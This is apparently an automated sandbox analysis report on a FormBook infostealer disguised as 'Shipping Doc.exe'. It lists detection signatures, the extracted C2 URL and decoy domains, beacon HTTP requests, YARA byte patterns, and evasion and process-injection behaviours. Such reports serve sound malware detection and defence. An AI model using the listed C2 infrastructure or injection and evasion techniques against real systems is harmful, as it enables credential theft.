
Windows Analysis Report Shipping Doc.exe

Overview

General Information

Sample Name: Shipping Doc.exe
Analysis ID: 458885
MD5: 159d560ff64cdb2d130b1635f4123a49
SHA1: 5762036dd01f8a63ce29557c5c0464360500c7e6
SHA256: 065252f5ed5475c89d2bff7389554a4695a85900a7a75eb98170c6a372b33ea0
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Shipping Doc.exe (PID: 1932 cmdline: 'C:\Users\user\Desktop\Shipping Doc.exe' MD5: 159D560FF64CDB2D130B1635F4123A49)
    • Shipping Doc.exe (PID: 2148 cmdline: C:\Users\user\Desktop\Shipping Doc.exe MD5: 159D560FF64CDB2D130B1635F4123A49)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 2000 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 3984 cmdline: /c del 'C:\Users\user\Desktop\Shipping Doc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.shopjempress.com/amb6/"], "decoy": ["segurocars.com", "rylautosales.com", "xinglinjiankang.com", "dantil-brand.com", "sofaloffa.club", "coinclub2.com", "ez-pens.com", "gqtlqsw.com", "robotnewswire.com", "ktproductreviews.com", "merchbrander.com", "yesonamendmentb.com", "losgatoslimos.com", "kristincole.art", "metalmaids.online", "leftcoastmodels.com", "athetheist.com", "jblbusrtingsale.com", "chungcugiarehcm.com", "renblockchain.com", "bigdaddy.fish", "comproliverton.pro", "gzmove.com", "honeythymeherbfarm.com", "davinescosmetics.com", "9355693.com", "movinmemphis901.com", "patriotsrs.net", "dagelijkseschoenen.com", "a-want-ad.site", "theodbox.com", "audioky.net", "hopematthewsrealtor.com", "theonlinemoneymachine.com", "misakiti.com", "ad-yalong.com", "mikealazo.com", "marianoterra.com", "shivorja.com", "goodvibrationswindchimes.com", "pecom-deliverry.online", "amlexcel.com", "emeralddrumcompany.com", "dalipaella.com", "shopcamacci.com", "xucaiwujin.com", "bxs5000.com", "2en1institut.com", "zxzm47-wj.com", "builttek.com", "66400yy.com", "beegraze.com", "thedottedcat.com", "komsah.com", "4202nsacramentoav.info", "88q27.com", "toriengenharia.com", "briscoewelding.com", "brookelenzi.com", "tribaltrash.com", "bidtas.com", "shokhorror.com", "bodurm.com", "333.wiki"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further memory-dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.Shipping Doc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.Shipping Doc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.Shipping Doc.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
4.2.Shipping Doc.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.Shipping Doc.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked-PE entry not shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.shopjempress.com/amb6/"], "decoy": ["segurocars.com", "rylautosales.com", "xinglinjiankang.com", "dantil-brand.com", "sofaloffa.club", "coinclub2.com", "ez-pens.com", "gqtlqsw.com", "robotnewswire.com", "ktproductreviews.com", "merchbrander.com", "yesonamendmentb.com", "losgatoslimos.com", "kristincole.art", "metalmaids.online", "leftcoastmodels.com", "athetheist.com", "jblbusrtingsale.com", "chungcugiarehcm.com", "renblockchain.com", "bigdaddy.fish", "comproliverton.pro", "gzmove.com", "honeythymeherbfarm.com", "davinescosmetics.com", "9355693.com", "movinmemphis901.com", "patriotsrs.net", "dagelijkseschoenen.com", "a-want-ad.site", "theodbox.com", "audioky.net", "hopematthewsrealtor.com", "theonlinemoneymachine.com", "misakiti.com", "ad-yalong.com", "mikealazo.com", "marianoterra.com", "shivorja.com", "goodvibrationswindchimes.com", "pecom-deliverry.online", "amlexcel.com", "emeralddrumcompany.com", "dalipaella.com", "shopcamacci.com", "xucaiwujin.com", "bxs5000.com", "2en1institut.com", "zxzm47-wj.com", "builttek.com", "66400yy.com", "beegraze.com", "thedottedcat.com", "komsah.com", "4202nsacramentoav.info", "88q27.com", "toriengenharia.com", "briscoewelding.com", "brookelenzi.com", "tribaltrash.com", "bidtas.com", "shokhorror.com", "bodurm.com", "333.wiki"]}
Multi AV Scanner detection for submitted file
Source: Shipping Doc.exe | Virustotal: Detection: 50%
Source: Shipping Doc.exe | Metadefender: Detection: 31%
Source: Shipping Doc.exe | ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match | File source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: Shipping Doc.exe | Joe Sandbox ML: detected
Source: 4.2.Shipping Doc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Shipping Doc.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Shipping Doc.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP | source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe, 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe
Source: Binary string: cscript.pdb | source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\Shipping Doc.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\Shipping Doc.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\Shipping Doc.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop edi

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.shopjempress.com/amb6/
Source: global traffic | HTTP traffic detected: GET /amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR HTTP/1.1 Host: www.bigdaddy.fish Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR HTTP/1.1 Host: www.davinescosmetics.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | ASN Name: DREAMHOST-ASUS DREAMHOST-ASUS
Source: unknown | DNS traffic detected: queries for: www.bigdaddy.fish
Source: cscript.exe, 0000000F.00000002.483172630.0000000005E2F000.00000004.00000001.sdmp | String found in binary or memory: http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC
Source: explorer.exe, 00000006.00000000.282041503.00000000089C0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Shipping Doc.exe, 00000002.00000003.218505402.00000000057C6000.00000004.00000001.sdmp, Shipping Doc.exe, 00000002.00000003.218511303.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Shipping Doc.exe, 00000002.00000003.219138017.00000000057BE000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Shipping Doc.exe, 00000002.00000003.219469628.0000000005799000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comalsdn
Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comcomFU
Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comd
Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comlicd
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: Shipping Doc.exe, 00000002.00000003.213525769.000000000579B000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comicV
Source: Shipping Doc.exe, 00000002.00000003.213474844.000000000579B000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comny
Source: Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Shipping Doc.exe, 00000002.00000003.216929499.0000000005786000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn&
Source: Shipping Doc.exe, 00000002.00000003.216788502.0000000005786000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn4
Source: Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn8
Source: Shipping Doc.exe, 00000002.00000003.216929499.0000000005786000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnP
Source: Shipping Doc.exe, 00000002.00000003.215912066.000000000578E000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnd
Source: Shipping Doc.exe, 00000002.00000003.215964486.0000000000E0D000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cny
Source: Shipping Doc.exe, 00000002.00000003.215964486.0000000000E0D000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnz
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Shipping Doc.exe, 00000002.00000003.222324750.0000000005792000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/0
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/8
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/;
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/B
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/U
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0a
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/argeg
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/d
Source: Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/en-u
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/en-ut
Source: Shipping Doc.exe, 00000002.00000003.218167835.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/fr-f
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/n
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/q
Source: Shipping Doc.exe, 00000002.00000003.218167835.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/siv
Source: Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/vam&
Source: Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.coma7
Source: Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.comiv
Source: Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp, Shipping Doc.exe, 00000002.00000003.218511303.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: Shipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.comc
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: Shipping Doc.exe, 00000002.00000003.214716683.000000000579B000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comI
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: Shipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.de
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\Shipping Doc.exe | Code function: 4_2_00419D60 NtCreateFile
Source: C:\Users\user\Desktop\Shipping Doc.exe | Code function: 4_2_00419E10 NtReadFile
Source: C:\Users\user\Desktop\Shipping Doc.exe | Code function: 4_2_00419E90 NtClose
Source: C:\Users\user\Desktop\Shipping Doc.exe | Code function: 4_2_00419F40 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Shipping Doc.exe | Code function: 4_2_00419D5B NtCreateFile
Source: C:\Users\user\Desktop\Shipping Doc.exe | Code function: 4_2_00419E8B NtClose
Source: C:\Users\user\Desktop\Shipping Doc.exe | Code function: 4_2_00419F3A NtAllocateVirtualMemory
